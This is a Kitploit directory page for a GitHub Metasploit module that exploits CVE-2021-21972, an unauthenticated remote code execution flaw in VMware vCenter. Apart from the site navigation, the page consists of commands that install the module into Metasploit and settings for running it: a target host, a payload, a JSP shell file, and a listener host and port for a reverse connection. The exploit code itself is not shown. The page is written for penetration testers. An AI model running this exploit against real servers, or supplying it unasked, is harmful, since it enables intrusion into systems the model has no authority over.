Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-21972 — CVE-2021-21972 Unauthorized RCE in VMware vCenter metasploit exploit script | Kitploit
Tools/GitHubGitHub/taroballzchen/cve-2021-21972
Exploit FrameworksVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubtaroballzchen/cve-2021-21972

CVE-2021-21972

CVE-2021-21972 Unauthorized RCE in VMware vCenter metasploit exploit script

View Repository
1965 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-21972

CVE-2021-21972 Unauthorized RCE in VMware vCenter metasploit exploit script

preparation

root@kitploit:~
git clone https://github.com/TaroballzChen/CVE-2021-21972
cd CVE-2021-21972
mkdir -p ~/.msf4/modules/exploits/multi/http
cp * ~/.msf4/modules/exploits/multi/http
chmod +x ~/.msf4/modules/exploits/multi/http/vmware_vcenter_server_unauthenticated_file_upload_exploit.py
msfconsole

metasploit usage

root@kitploit:~
set target <target>
set PAYLOAD <payload>
set rfile ~/.msf4/modules/exploits/multi/http/shell1.jsp
set rhost <vuln ip>
set rssl <true for https ; false for http>
set port <vuln port>
set LHOST <list host ip>
set LPORT <list port>

exploit

setting exploit

Download Tool